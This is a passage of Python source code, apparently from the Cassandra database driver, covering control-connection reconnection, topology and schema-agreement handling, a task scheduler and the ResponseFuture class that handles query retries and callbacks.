self._cluster.signal_connection_failure(host, exc, is_host_addition=False)
except Exception as exc:
errors[host.address] = exc
log.warning("[control connection] Error connecting to %s:", host, exc_info=True)
if self._is_shutdown:
raise DriverException("[control connection] Reconnection in progress during shutdown")
raise NoHostAvailable("Unable to connect to any servers", errors)
def _try_connect(self, host):
"""
Creates a new Connection, registers for pushed events, and refreshes
node/token and schema metadata.
"""
log.debug("[control connection] Opening new connection to %s", host)
while True:
try:
connection = self._cluster.connection_factory(host.address, is_control_connection=True)
if self._is_shutdown:
connection.close()
raise DriverException("Reconnecting during shutdown")
break
except ProtocolVersionUnsupported as e:
self._cluster.protocol_downgrade(host.address, e.startup_version)
log.debug("[control connection] Established new connection %r, "
"registering watchers and refreshing schema and topology",
connection)
# use weak references in both directions
# _clear_watcher will be called when this ControlConnection is about to be finalized
# _watch_callback will get the actual callback from the Connection and relay it to
# this object (after a dereferencing a weakref)
self_weakref = weakref.ref(self, partial(_clear_watcher, weakref.proxy(connection)))
try:
connection.register_watchers({
"TOPOLOGY_CHANGE": partial(_watch_callback, self_weakref, '_handle_topology_change'),
"STATUS_CHANGE": partial(_watch_callback, self_weakref, '_handle_status_change'),
"SCHEMA_CHANGE": partial(_watch_callback, self_weakref, '_handle_schema_change')
}, register_timeout=self._timeout)
sel_peers = self._SELECT_PEERS if self._token_meta_enabled else self._SELECT_PEERS_NO_TOKENS
sel_local = self._SELECT_LOCAL if self._token_meta_enabled else self._SELECT_LOCAL_NO_TOKENS
peers_query = QueryMessage(query=sel_peers, consistency_level=ConsistencyLevel.ONE)
local_query = QueryMessage(query=sel_local, consistency_level=ConsistencyLevel.ONE)
shared_results = connection.wait_for_responses(
peers_query, local_query, timeout=self._timeout)
self._refresh_node_list_and_token_map(connection, preloaded_results=shared_results)
self._refresh_schema(connection, preloaded_results=shared_results, schema_agreement_wait=-1)
except Exception:
connection.close()
raise
return connection
def reconnect(self):
if self._is_shutdown:
return
self._submit(self._reconnect)
def _reconnect(self):
log.debug("[control connection] Attempting to reconnect")
try:
self._set_new_connection(self._reconnect_internal())
except NoHostAvailable:
# make a retry schedule (which includes backoff)
schedule = self.cluster.reconnection_policy.new_schedule()
with self._reconnection_lock:
# cancel existing reconnection attempts
if self._reconnection_handler:
self._reconnection_handler.cancel()
# when a connection is successfully made, _set_new_connection
# will be called with the new connection and then our
# _reconnection_handler will be cleared out
self._reconnection_handler = _ControlReconnectionHandler(
self, self._cluster.scheduler, schedule,
self._get_and_set_reconnection_handler,
new_handler=None)
self._reconnection_handler.start()
except Exception:
log.debug("[control connection] error reconnecting", exc_info=True)
raise
def _get_and_set_reconnection_handler(self, new_handler):
"""
Called by the _ControlReconnectionHandler when a new connection
is successfully created. Clears out the _reconnection_handler on
this ControlConnection.
"""
with self._reconnection_lock:
old = self._reconnection_handler
self._reconnection_handler = new_handler
return old
def _submit(self, *args, **kwargs):
try:
if not self._cluster.is_shutdown:
return self._cluster.executor.submit(*args, **kwargs)
except ReferenceError:
pass
return None
def shutdown(self):
# stop trying to reconnect (if we are)
with self._reconnection_lock:
if self._reconnection_handler:
self._reconnection_handler.cancel()
with self._lock:
if self._is_shutdown:
return
else:
self._is_shutdown = True
log.debug("Shutting down control connection")
if self._connection:
self._connection.close()
self._connection = None
def refresh_schema(self, force=False, **kwargs):
try:
if self._connection:
return self._refresh_schema(self._connection, force=force, **kwargs)
except ReferenceError:
pass # our weak reference to the Cluster is no good
except Exception:
log.debug("[control connection] Error refreshing schema", exc_info=True)
self._signal_error()
return False
def _refresh_schema(self, connection, preloaded_results=None, schema_agreement_wait=None, force=False, **kwargs):
if self._cluster.is_shutdown:
return False
agreed = self.wait_for_schema_agreement(connection,
preloaded_results=preloaded_results,
wait_time=schema_agreement_wait)
if not self._schema_meta_enabled and not force:
log.debug("[control connection] Skipping schema refresh because schema metadata is disabled")
return False
if not agreed:
log.debug("Skipping schema refresh due to lack of schema agreement")
return False
self._cluster.metadata.refresh(connection, self._timeout, **kwargs)
return True
def refresh_node_list_and_token_map(self, force_token_rebuild=False):
try:
if self._connection:
self._refresh_node_list_and_token_map(self._connection, force_token_rebuild=force_token_rebuild)
return True
except ReferenceError:
pass # our weak reference to the Cluster is no good
except Exception:
log.debug("[control connection] Error refreshing node list and token map", exc_info=True)
self._signal_error()
return False
def _refresh_node_list_and_token_map(self, connection, preloaded_results=None,
force_token_rebuild=False):
if preloaded_results:
log.debug("[control connection] Refreshing node list and token map using preloaded results")
peers_result = preloaded_results[0]
local_result = preloaded_results[1]
else:
cl = ConsistencyLevel.ONE
if not self._token_meta_enabled:
log.debug("[control connection] Refreshing node list without token map")
sel_peers = self._SELECT_PEERS_NO_TOKENS
sel_local = self._SELECT_LOCAL_NO_TOKENS
else:
log.debug("[control connection] Refreshing node list and token map")
sel_peers = self._SELECT_PEERS
sel_local = self._SELECT_LOCAL
peers_query = QueryMessage(query=sel_peers, consistency_level=cl)
local_query = QueryMessage(query=sel_local, consistency_level=cl)
peers_result, local_result = connection.wait_for_responses(
peers_query, local_query, timeout=self._timeout)
peers_result = dict_factory(*peers_result.results)
partitioner = None
token_map = {}
found_hosts = set()
if local_result.results:
found_hosts.add(connection.host)
local_rows = dict_factory(*(local_result.results))
local_row = local_rows[0]
cluster_name = local_row["cluster_name"]
self._cluster.metadata.cluster_name = cluster_name
partitioner = local_row.get("partitioner")
tokens = local_row.get("tokens")
host = self._cluster.metadata.get_host(connection.host)
if host:
datacenter = local_row.get("data_center")
rack = local_row.get("rack")
self._update_location_info(host, datacenter, rack)
host.listen_address = local_row.get("listen_address")
host.broadcast_address = local_row.get("broadcast_address")
host.release_version = local_row.get("release_version")
host.dse_version = local_row.get("dse_version")
host.dse_workload = local_row.get("workload")
if partitioner and tokens:
token_map[host] = tokens
# Check metadata.partitioner to see if we haven't built anything yet. If
# every node in the cluster was in the contact points, we won't discover
# any new nodes, so we need this additional check. (See PYTHON-90)
should_rebuild_token_map = force_token_rebuild or self._cluster.metadata.partitioner is None
for row in peers_result:
addr = self._rpc_from_peer_row(row)
tokens = row.get("tokens", None)
if 'tokens' in row and not tokens: # it was selected, but empty
log.warning("Excluding host (%s) with no tokens in system.peers table of %s." % (addr, connection.host))
continue
if addr in found_hosts:
log.warning("Found multiple hosts with the same rpc_address (%s). Excluding peer %s", addr, row.get("peer"))
continue
found_hosts.add(addr)
host = self._cluster.metadata.get_host(addr)
datacenter = row.get("data_center")
rack = row.get("rack")
if host is None:
log.debug("[control connection] Found new host to connect to: %s", addr)
host, _ = self._cluster.add_host(addr, datacenter, rack, signal=True, refresh_nodes=False)
should_rebuild_token_map = True
else:
should_rebuild_token_map |= self._update_location_info(host, datacenter, rack)
host.broadcast_address = row.get("peer")
host.release_version = row.get("release_version")
host.dse_version = row.get("dse_version")
host.dse_workload = row.get("workload")
if partitioner and tokens:
token_map[host] = tokens
for old_host in self._cluster.metadata.all_hosts():
if old_host.address != connection.host and old_host.address not in found_hosts:
should_rebuild_token_map = True
if old_host.address not in self._cluster.contact_points:
log.debug("[control connection] Removing host not found in peers metadata: %r", old_host)
self._cluster.remove_host(old_host)
log.debug("[control connection] Finished fetching ring info")
if partitioner and should_rebuild_token_map:
log.debug("[control connection] Rebuilding token map due to topology changes")
self._cluster.metadata.rebuild_token_map(partitioner, token_map)
def _update_location_info(self, host, datacenter, rack):
if host.datacenter == datacenter and host.rack == rack:
return False
# If the dc/rack information changes, we need to update the load balancing policy.
# For that, we remove and re-add the node against the policy. Not the most elegant, and assumes
# that the policy will update correctly, but in practice this should work.
self._cluster.load_balancing_policy.on_down(host)
host.set_location_info(datacenter, rack)
self._cluster.load_balancing_policy.on_up(host)
return True
def _delay_for_event_type(self, event_type, delay_window):
# this serves to order processing correlated events (received within the window)
# the window and randomization still have the desired effect of skew across client instances
next_time = self._event_schedule_times.get(event_type, 0)
now = self._time.time()
if now <= next_time:
this_time = next_time + 0.01
delay = this_time - now
else:
delay = random() * delay_window
this_time = now + delay
self._event_schedule_times[event_type] = this_time
return delay
def _refresh_nodes_if_not_up(self, addr):
"""
Used to mitigate refreshes for nodes that are already known.
Some versions of the server send superfluous NEW_NODE messages in addition to UP events.
"""
host = self._cluster.metadata.get_host(addr)
if not host or not host.is_up:
self.refresh_node_list_and_token_map()
def _handle_topology_change(self, event):
change_type = event["change_type"]
addr = self._translate_address(event["address"][0])
if change_type == "NEW_NODE" or change_type == "MOVED_NODE":
if self._topology_event_refresh_window >= 0:
delay = self._delay_for_event_type('topology_change', self._topology_event_refresh_window)
self._cluster.scheduler.schedule_unique(delay, self._refresh_nodes_if_not_up, addr)
elif change_type == "REMOVED_NODE":
host = self._cluster.metadata.get_host(addr)
self._cluster.scheduler.schedule_unique(0, self._cluster.remove_host, host)
def _handle_status_change(self, event):
change_type = event["change_type"]
addr = self._translate_address(event["address"][0])
host = self._cluster.metadata.get_host(addr)
if change_type == "UP":
delay = self._delay_for_event_type('status_change', self._status_event_refresh_window)
if host is None:
# this is the first time we've seen the node
self._cluster.scheduler.schedule_unique(delay, self.refresh_node_list_and_token_map)
else:
self._cluster.scheduler.schedule_unique(delay, self._cluster.on_up, host)
elif change_type == "DOWN":
# Note that there is a slight risk we can receive the event late and thus
# mark the host down even though we already had reconnected successfully.
# But it is unlikely, and don't have too much consequence since we'll try reconnecting
# right away, so we favor the detection to make the Host.is_up more accurate.
if host is not None:
# this will be run by the scheduler
self._cluster.on_down(host, is_host_addition=False)
def _translate_address(self, addr):
return self._cluster.address_translator.translate(addr)
def _handle_schema_change(self, event):
if self._schema_event_refresh_window < 0:
return
delay = self._delay_for_event_type('schema_change', self._schema_event_refresh_window)
self._cluster.scheduler.schedule_unique(delay, self.refresh_schema, **event)
def wait_for_schema_agreement(self, connection=None, preloaded_results=None, wait_time=None):
total_timeout = wait_time if wait_time is not None else self._cluster.max_schema_agreement_wait
if total_timeout <= 0:
return True
# Each schema change typically generates two schema refreshes, one
# from the response type and one from the pushed notification. Holding
# a lock is just a simple way to cut down on the number of schema queries
# we'll make.
with self._schema_agreement_lock:
if self._is_shutdown:
return
if not connection:
connection = self._connection
if preloaded_results:
log.debug("[control connection] Attempting to use preloaded results for schema agreement")
peers_result = preloaded_results[0]
local_result = preloaded_results[1]
schema_mismatches = self._get_schema_mismatches(peers_result, local_result, connection.host)
if schema_mismatches is None:
return True
log.debug("[control connection] Waiting for schema agreement")
start = self._time.time()
elapsed = 0
cl = ConsistencyLevel.ONE
schema_mismatches = None
while elapsed < total_timeout:
peers_query = QueryMessage(query=self._SELECT_SCHEMA_PEERS, consistency_level=cl)
local_query = QueryMessage(query=self._SELECT_SCHEMA_LOCAL, consistency_level=cl)
try:
timeout = min(self._timeout, total_timeout - elapsed)
peers_result, local_result = connection.wait_for_responses(
peers_query, local_query, timeout=timeout)
except OperationTimedOut as timeout:
log.debug("[control connection] Timed out waiting for "
"response during schema agreement check: %s", timeout)
elapsed = self._time.time() - start
continue
except ConnectionShutdown:
if self._is_shutdown:
log.debug("[control connection] Aborting wait for schema match due to shutdown")
return None
else:
raise
schema_mismatches = self._get_schema_mismatches(peers_result, local_result, connection.host)
if schema_mismatches is None:
return True
log.debug("[control connection] Schemas mismatched, trying again")
self._time.sleep(0.2)
elapsed = self._time.time() - start
log.warning("Node %s is reporting a schema disagreement: %s",
connection.host, schema_mismatches)
return False
def _get_schema_mismatches(self, peers_result, local_result, local_address):
peers_result = dict_factory(*peers_result.results)
versions = defaultdict(set)
if local_result.results:
local_row = dict_factory(*local_result.results)[0]
if local_row.get("schema_version"):
versions[local_row.get("schema_version")].add(local_address)
lbp = self._cluster.load_balancing_policy
for row in peers_result:
schema_ver = row.get('schema_version')
if not schema_ver:
continue
addr = self._rpc_from_peer_row(row)
peer = self._cluster.metadata.get_host(addr)
if peer and peer.is_up and lbp.distance(peer) != HostDistance.IGNORED:
versions[schema_ver].add(addr)
if len(versions) == 1:
log.debug("[control connection] Schemas match")
return None
return dict((version, list(nodes)) for version, nodes in six.iteritems(versions))
def _rpc_from_peer_row(self, row):
addr = row.get("rpc_address")
if not addr or addr in ["0.0.0.0", "::"]:
addr = row.get("peer")
return self._translate_address(addr)
def _signal_error(self):
with self._lock:
if self._is_shutdown:
return
# try just signaling the cluster, as this will trigger a reconnect
# as part of marking the host down
if self._connection and self._connection.is_defunct:
host = self._cluster.metadata.get_host(self._connection.host)
# host may be None if it's already been removed, but that indicates
# that errors have already been reported, so we're fine
if host:
self._cluster.signal_connection_failure(
host, self._connection.last_error, is_host_addition=False)
return
# if the connection is not defunct or the host already left, reconnect
# manually
self.reconnect()
def on_up(self, host):
pass
def on_down(self, host):
conn = self._connection
if conn and conn.host == host.address and \
self._reconnection_handler is None:
log.debug("[control connection] Control connection host (%s) is "
"considered down, starting reconnection", host)
# this will result in a task being submitted to the executor to reconnect
self.reconnect()
def on_add(self, host, refresh_nodes=True):
if refresh_nodes:
self.refresh_node_list_and_token_map(force_token_rebuild=True)
def on_remove(self, host):
c = self._connection
if c and c.host == host.address:
log.debug("[control connection] Control connection host (%s) is being removed. Reconnecting", host)
# refresh will be done on reconnect
self.reconnect()
else:
self.refresh_node_list_and_token_map(force_token_rebuild=True)
def get_connections(self):
c = getattr(self, '_connection', None)
return [c] if c else []
def return_connection(self, connection):
if connection is self._connection and (connection.is_defunct or connection.is_closed):
self.reconnect()
def _stop_scheduler(scheduler, thread):
try:
if not scheduler.is_shutdown:
scheduler.shutdown()
except ReferenceError:
pass
thread.join()
class _Scheduler(Thread):
_queue = None
_scheduled_tasks = None
_executor = None
is_shutdown = False
def __init__(self, executor):
self._queue = Queue.PriorityQueue()
self._scheduled_tasks = set()
self._count = count()
self._executor = executor
Thread.__init__(self, name="Task Scheduler")
self.daemon = True
self.start()
def shutdown(self):
try:
log.debug("Shutting down Cluster Scheduler")
except AttributeError:
# this can happen on interpreter shutdown
pass
self.is_shutdown = True
self._queue.put_nowait((0, 0, None))
self.join()
def schedule(self, delay, fn, *args, **kwargs):
self._insert_task(delay, (fn, args, tuple(kwargs.items())))
def schedule_unique(self, delay, fn, *args, **kwargs):
task = (fn, args, tuple(kwargs.items()))
if task not in self._scheduled_tasks:
self._insert_task(delay, task)
else:
log.debug("Ignoring schedule_unique for already-scheduled task: %r", task)
def _insert_task(self, delay, task):
if not self.is_shutdown:
run_at = time.time() + delay
self._scheduled_tasks.add(task)
self._queue.put_nowait((run_at, next(self._count), task))
else:
log.debug("Ignoring scheduled task after shutdown: %r", task)
def run(self):
while True:
if self.is_shutdown:
return
try:
while True:
run_at, i, task = self._queue.get(block=True, timeout=None)
if self.is_shutdown:
if task:
log.debug("Not executing scheduled task due to Scheduler shutdown")
return
if run_at <= time.time():
self._scheduled_tasks.discard(task)
fn, args, kwargs = task
kwargs = dict(kwargs)
future = self._executor.submit(fn, *args, **kwargs)
future.add_done_callback(self._log_if_failed)
else:
self._queue.put_nowait((run_at, i, task))
break
except Queue.Empty:
pass
time.sleep(0.1)
def _log_if_failed(self, future):
exc = future.exception()
if exc:
log.warning(
"An internally scheduled tasked failed with an unhandled exception:",
exc_info=exc)
def refresh_schema_and_set_result(control_conn, response_future, **kwargs):
try:
log.debug("Refreshing schema in response to schema change. "
"%s", kwargs)
response_future.is_schema_agreed = control_conn._refresh_schema(response_future._connection, **kwargs)
except Exception:
log.exception("Exception refreshing schema in response to schema change:")
response_future.session.submit(control_conn.refresh_schema, **kwargs)
finally:
response_future._set_final_result(None)
class ResponseFuture(object):
"""
An asynchronous response delivery mechanism that is returned from calls
to :meth:`.Session.execute_async()`.
There are two ways for results to be delivered:
- Synchronously, by calling :meth:`.result()`
- Asynchronously, by attaching callback and errback functions via
:meth:`.add_callback()`, :meth:`.add_errback()`, and
:meth:`.add_callbacks()`.
"""
query = None
"""
The :class:`~.Statement` instance that is being executed through this
:class:`.ResponseFuture`.
"""
is_schema_agreed = True
"""
For DDL requests, this may be set ``False`` if the schema agreement poll after the response fails.
Always ``True`` for non-DDL requests.
"""
session = None
row_factory = None
message = None
default_timeout = None
_req_id = None
_final_result = _NOT_SET
_col_names = None
_final_exception = None
_query_traces = None
_callbacks = None
_errbacks = None
_current_host = None
_current_pool = None
_connection = None
_query_retries = 0
_start_time = None
_metrics = None
_paging_state = None
_custom_payload = None
_warnings = None
_timer = None
_protocol_handler = ProtocolHandler
_warned_timeout = False
def __init__(self, session, message, query, timeout, metrics=None, prepared_statement=None):
self.session = session
self.row_factory = session.row_factory
self.message = message
self.query = query
self.timeout = timeout
self._metrics = metrics
self.prepared_statement = prepared_statement
self._callback_lock = Lock()
if metrics is not None:
self._start_time = time.time()
self._make_query_plan()
self._event = Event()
self._errors = {}
self._callbacks = []
self._errbacks = []
def _start_timer(self):
if self.timeout is not None:
self._timer = self.session.cluster.connection_class.create_timer(self.timeout, self._on_timeout)
def _cancel_timer(self):
if self._timer:
self._timer.cancel()
def _on_timeout(self):
errors = self._errors
if not errors:
if self.is_schema_agreed:
errors = {self._current_host.address: "Client request timeout. See Session.execute[_async](timeout)"}
else:
connection = getattr(self.session.cluster.control_connection, '_connection')
host = connection.host if connection else 'unknown'
errors = {host: "Request timed out while waiting for schema agreement. See Session.execute[_async](timeout) and Cluster.max_schema_agreement_wait."}
self._set_final_exception(OperationTimedOut(errors, self._current_host))
def _make_query_plan(self):
# convert the list/generator/etc to an iterator so that subsequent
# calls to send_request (which retries may do) will resume where
# they last left off
self.query_plan = iter(self.session._load_balancer.make_query_plan(
self.session.keyspace, self.query))
def send_request(self):
""" Internal """
# query_plan is an iterator, so this will resume where we last left
# off if send_request() is called multiple times
start = time.time()
for host in self.query_plan:
req_id = self._query(host)
if req_id is not None:
self._req_id = req_id
# timer is only started here, after we have at least one message queued
# this is done to avoid overrun of timers with unfettered client requests
# in the case of full disconnect, where no hosts will be available
if self._timer is None:
self._start_timer()
return
if self.timeout is not None and time.time() - start > self.timeout:
self._on_timeout()
return
self._set_final_exception(NoHostAvailable(
"Unable to complete the operation against any hosts", self._errors))
def _query(self, host, message=None, cb=None):
if message is None:
message = self.message
if cb is None:
cb = self._set_result
pool = self.session._pools.get(host)
if not pool:
self._errors[host] = ConnectionException("Host has been marked down or removed")
return None
elif pool.is_shutdown:
self._errors[host] = ConnectionException("Pool is shutdown")
return None
self._current_host = host
self._current_pool = pool
connection = None
try:
# TODO get connectTimeout from cluster settings
connection, request_id = pool.borrow_connection(timeout=2.0)
self._connection = connection
connection.send_msg(message, request_id, cb=cb, encoder=self._protocol_handler.encode_message, decoder=self._protocol_handler.decode_message)
return request_id
except NoConnectionsAvailable as exc:
log.debug("All connections for host %s are at capacity, moving to the next host", host)
self._errors[host] = exc
return None
except Exception as exc:
log.debug("Error querying host %s", host, exc_info=True)
self._errors[host] = exc
if self._metrics is not None:
self._metrics.on_connection_error()
if connection:
pool.return_connection(connection)
return None
@property
def has_more_pages(self):
"""
Returns :const:`True` if there are more pages left in the
query results, :const:`False` otherwise. This should only
be checked after the first page has been returned.
.. versionadded:: 2.0.0
"""
return self._paging_state is not None
@property
def warnings(self):
"""
Warnings returned from the server, if any. This will only be
set for protocol_version 4+.
Warnings may be returned for such things as oversized batches,
or too many tombstones in slice queries.
Ensure the future is complete before trying to access this property
(call :meth:`.result()`, or after callback is invoked).
Otherwise it may throw if the response has not been received.
"""
# TODO: When timers are introduced, just make this wait
if not self._event.is_set():
raise DriverException("warnings cannot be retrieved before ResponseFuture is finalized")
return self._warnings
@property
def custom_payload(self):
"""
The custom payload returned from the server, if any. This will only be
set by Cassandra servers implementing a custom QueryHandler, and only
for protocol_version 4+.
Ensure the future is complete before trying to access this property
(call :meth:`.result()`, or after callback is invoked).
Otherwise it may throw if the response has not been received.
:return: :ref:`custom_payload`.
"""
# TODO: When timers are introduced, just make this wait
if not self._event.is_set():
raise DriverException("custom_payload cannot be retrieved before ResponseFuture is finalized")
return self._custom_payload
def start_fetching_next_page(self):
"""
If there are more pages left in the query result, this asynchronously
starts fetching the next page. If there are no pages left, :exc:`.QueryExhausted`
is raised. Also see :attr:`.has_more_pages`.
This should only be called after the first page has been returned.
.. versionadded:: 2.0.0
"""
if not self._paging_state:
raise QueryExhausted()
self._make_query_plan()
self.message.paging_state = self._paging_state
self._event.clear()
self._final_result = _NOT_SET
self._final_exception = None
self._timer = None # clear cancelled timer; new one will be set when request is queued
self.send_request()
def _reprepare(self, prepare_message):
cb = partial(self.session.submit, self._execute_after_prepare)
request_id = self._query(self._current_host, prepare_message, cb=cb)
if request_id is None:
# try to submit the original prepared statement on some other host
self.send_request()
def _set_result(self, response):
try:
if self._current_pool and self._connection:
self._current_pool.return_connection(self._connection)
trace_id = getattr(response, 'trace_id', None)
if trace_id:
if not self._query_traces:
self._query_traces = []
self._query_traces.append(QueryTrace(trace_id, self.session))
self._warnings = getattr(response, 'warnings', None)
self._custom_payload = getattr(response, 'custom_payload', None)
if isinstance(response, ResultMessage):
if response.kind == RESULT_KIND_SET_KEYSPACE:
session = getattr(self, 'session', None)
# since we're running on the event loop thread, we need to
# use a non-blocking method for setting the keyspace on
# all connections in this session, otherwise the event
# loop thread will deadlock waiting for keyspaces to be
# set. This uses a callback chain which ends with
# self._set_keyspace_completed() being called in the
# event loop thread.
if session:
session._set_keyspace_for_all_pools(
response.results, self._set_keyspace_completed)
elif response.kind == RESULT_KIND_SCHEMA_CHANGE:
# refresh the schema before responding, but do it in another
# thread instead of the event loop thread
self.is_schema_agreed = False
self.session.submit(
refresh_schema_and_set_result,
self.session.cluster.control_connection,
self, **response.results)
else:
results = getattr(response, 'results', None)
if results is not None and response.kind == RESULT_KIND_ROWS:
self._paging_state = response.paging_state
self._col_names = results[0]
results = self.row_factory(*results)
self._set_final_result(results)
elif isinstance(response, ErrorMessage):
retry_policy = None
if self.query:
retry_policy = self.query.retry_policy
if not retry_policy:
retry_policy = self.session.cluster.default_retry_policy
if isinstance(response, ReadTimeoutErrorMessage):
if self._metrics is not None:
self._metrics.on_read_timeout()
retry = retry_policy.on_read_timeout(
self.query, retry_num=self._query_retries, **response.info)
elif isinstance(response, WriteTimeoutErrorMessage):
if self._metrics is not None:
self._metrics.on_write_timeout()
retry = retry_policy.on_write_timeout(
self.query, retry_num=self._query_retries, **response.info)
elif isinstance(response, UnavailableErrorMessage):
if self._metrics is not None:
self._metrics.on_unavailable()
retry = retry_policy.on_unavailable(
self.query, retry_num=self._query_retries, **response.info)
elif isinstance(response, OverloadedErrorMessage):
if self._metrics is not None:
self._metrics.on_other_error()
# need to retry against a different host here
log.warning("Host %s is overloaded, retrying against a different "
"host", self._current_host)
self._retry(reuse_connection=False, consistency_level=None)
return
elif isinstance(response, IsBootstrappingErrorMessage):
if self._metrics is not None:
self._metrics.on_other_error()
# need to retry against a different host here
self._retry(reuse_connection=False, consistency_level=None)
return
elif isinstance(response, PreparedQueryNotFound):
if self.prepared_statement:
query_id = self.prepared_statement.query_id
assert query_id == response.info, \
"Got different query ID in server response (%s) than we " \
"had before (%s)" % (response.info, query_id)
else:
query_id = response.info
try:
prepared_statement = self.session.cluster._prepared_statements[query_id]
except KeyError:
if not self.prepared_statement:
log.error("Tried to execute unknown prepared statement: id=%s",
query_id.encode('hex'))
self._set_final_exception(response)
return
else:
prepared_statement = self.prepared_statement
self.session.cluster._prepared_statements[query_id] = prepared_statement
current_keyspace = self._connection.keyspace
prepared_keyspace = prepared_statement.keyspace
if prepared_keyspace and current_keyspace != prepared_keyspace:
self._set_final_exception(
ValueError("The Session's current keyspace (%s) does "
"not match the keyspace the statement was "
"prepared with (%s)" %
(current_keyspace, prepared_keyspace)))
return
log.debug("Re-preparing unrecognized prepared statement against host %s: %s",
self._current_host, prepared_statement.query_string)
prepare_message = PrepareMessage(query=prepared_statement.query_string)
# since this might block, run on the executor to avoid hanging
# the event loop thread
self.session.submit(self._reprepare, prepare_message)
return
else:
if hasattr(response, 'to_exception'):
self._set_final_exception(response.to_exception())
else:
self._set_final_exception(response)
return
retry_type, consistency = retry
if retry_type in (RetryPolicy.RETRY, RetryPolicy.RETRY_NEXT_HOST):
self._query_retries += 1
reuse = retry_type == RetryPolicy.RETRY
self._retry(reuse_connection=reuse, consistency_level=consistency)
elif retry_type is RetryPolicy.RETHROW:
self._set_final_exception(response.to_exception())
else: # IGNORE
if self._metrics is not None:
self._metrics.on_ignore()
self._set_final_result(None)
self._errors[self._current_host] = response.to_exception()
elif isinstance(response, ConnectionException):
if self._metrics is not None:
self._metrics.on_connection_error()
if not isinstance(response, ConnectionShutdown):
self._connection.defunct(response)
self._retry(reuse_connection=False, consistency_level=None)
elif isinstance(response, Exception):
if hasattr(response, 'to_exception'):
self._set_final_exception(response.to_exception())
else:
self._set_final_exception(response)
else:
# we got some other kind of response message
msg = "Got unexpected message: %r" % (response,)
exc = ConnectionException(msg, self._current_host)
self._connection.defunct(exc)
self._set_final_exception(exc)
except Exception as exc:
# almost certainly caused by a bug, but we need to set something here
log.exception("Unexpected exception while handling result in ResponseFuture:")
self._set_final_exception(exc)
def _set_keyspace_completed(self, errors):
if not errors:
self._set_final_result(None)
else:
self._set_final_exception(ConnectionException(
"Failed to set keyspace on all hosts: %s" % (errors,)))
def _execute_after_prepare(self, response):
"""
Handle the response to our attempt to prepare a statement.
If it succeeded, run the original query again against the same host.
"""
if self._current_pool and self._connection:
self._current_pool.return_connection(self._connection)
if self._final_exception:
return
if isinstance(response, ResultMessage):
if response.kind == RESULT_KIND_PREPARED:
# use self._query to re-use the same host and
# at the same time properly borrow the connection
request_id = self._query(self._current_host)
if request_id is None:
# this host errored out, move on to the next
self.send_request()
else:
self._set_final_exception(ConnectionException(
"Got unexpected response when preparing statement "
"on host %s: %s" % (self._current_host, response)))
elif isinstance(response, ErrorMessage):
if hasattr(response, 'to_exception'):
self._set_final_exception(response.to_exception())
else:
self._set_final_exception(response)
elif isinstance(response, ConnectionException):
log.debug("Connection error when preparing statement on host %s: %s",
self._current_host, response)
# try again on a different host, preparing again if necessary
self._errors[self._current_host] = response
self.send_request()
else:
self._set_final_exception(ConnectionException(
"Got unexpected response type when preparing "
"statement on host %s: %s" % (self._current_host, response)))
def _set_final_result(self, response):
self._cancel_timer()
if self._metrics is not None:
self._metrics.request_timer.addValue(time.time() - self._start_time)
with self._callback_lock:
self._final_result = response
self._event.set()
# apply each callback
for callback in self._callbacks:
fn, args, kwargs = callback
fn(response, *args, **kwargs)
def _set_final_exception(self, response):
self._cancel_timer()
if self._metrics is not None:
self._metrics.request_timer.addValue(time.time() - self._start_time)
with self._callback_lock:
self._final_exception = response
self._event.set()
for errback in self._errbacks:
fn, args, kwargs = errback
fn(response, *args, **kwargs)
def _retry(self, reuse_connection, consistency_level):
if self._final_exception:
# the connection probably broke while we were waiting
# to retry the operation
return
if self._metrics is not None:
self._metrics.on_retry()
if consistency_level is not None:
self.message.consistency_level = consistency_level
# don't retry on the event loop thread
self.session.submit(self._retry_task, reuse_connection)
def _retry_task(self, reuse_connection):
if self._final_exception:
# the connection probably broke while we were waiting
# to retry the operation
return
if reuse_connection and self._query(self._current_host) is not None:
return
# otherwise, move onto another host
self.send_request()
def result(self):
"""
Return the final result or raise an Exception if errors were
encountered. If the final result or error has not been set
yet, this method will block until it is set, or the timeout
set for the request expires.
Timeout is specified in the Session request execution functions.
If the timeout is exceeded, an :exc:`cassandra.OperationTimedOut` will be raised.
This is a client-side timeout. For more information
about server-side coordinator timeouts, see :class:`.policies.RetryPolicy`.
Example usage::
>>> future = session.execute_async("SELECT * FROM mycf")
>>> # do other stuff...
>>> try:
... rows = future.result()
... for row in rows:
... ... # process results
... except Exception:
... log.exception("Operation failed:")
"""
self._event.wait()
if self._final_result is not _NOT_SET:
return ResultSet(self, self._final_result)
else:
raise self._final_exception
def get_query_trace_ids(self):
"""
Returns the trace session ids for this future, if tracing was enabled (does not fetch trace data).
"""
return [trace.trace_id for trace in self._query_traces]
def get_query_trace(self, max_wait=None, query_cl=ConsistencyLevel.LOCAL_ONE):
"""
Fetches and returns the query trace of the last response, or `None` if tracing was
not enabled.
Note that this may raise an exception if there are problems retrieving the trace
details from Cassandra. If the trace is not available after `max_wait`,
:exc:`cassandra.query.TraceUnavailable` will be raised.
`query_cl` is the consistency level used to poll the trace tables.
"""
if self._query_traces:
return self._get_query_trace(len(self._query_traces) - 1, max_wait, query_cl)
def get_all_query_traces(self, max_wait_per=None, query_cl=ConsistencyLevel.LOCAL_ONE):
"""
Fetches and returns the query traces for all query pages, if tracing was enabled.
See note in :meth:`~.get_query_trace` regarding possible exceptions.
"""
if self._query_traces:
return [self._get_query_trace(i, max_wait_per, query_cl) for i in range(len(self._query_traces))]
return []
def _get_query_trace(self, i, max_wait, query_cl):
trace = self._query_traces[i]
if not trace.events:
trace.populate(max_wait=max_wait, query_cl=query_cl)
return trace
def add_callback(self, fn, *args, **kwargs):
"""
Attaches a callback function to be called when the final results arrive.
By default, `fn` will be called with the results as the first and only
argument. If `*args` or `**kwargs` are supplied, they will be passed
through as additional positional or keyword arguments to `fn`.
If an error is hit while executing the operation, a callback attached
here will not be called. Use :meth:`.add_errback()` or :meth:`add_callbacks()`
if you wish to handle that case.
If the final result has already been seen when this method is called,
the callback will be called immediately (before this method returns).
Note: in the case that the result is not available when the callback is added,
the callback is executed by IO event thread. This means that the callback
should not block or attempt further synchronous requests, because no further
IO will be processed until the callback returns.
**Important**: if the callback you attach results in an exception being
raised, **the exception will be ignored**, so please ensure your
callback handles all error cases that you care about.
Usage example::
>>> session = cluster.connect("mykeyspace")
>>> def handle_results(rows, start_time, should_log=False):
... if should_log:
... log.info("Total time: %f", time.time() - start_time)
... ...
>>> future = session.execute_async("SELECT * FROM users")
>>> future.add_callback(handle_results, time.time(), should_log=True)
"""
run_now = False
with self._callback_lock:
if self._final_result is not _NOT_SET:
run_now = True
else:
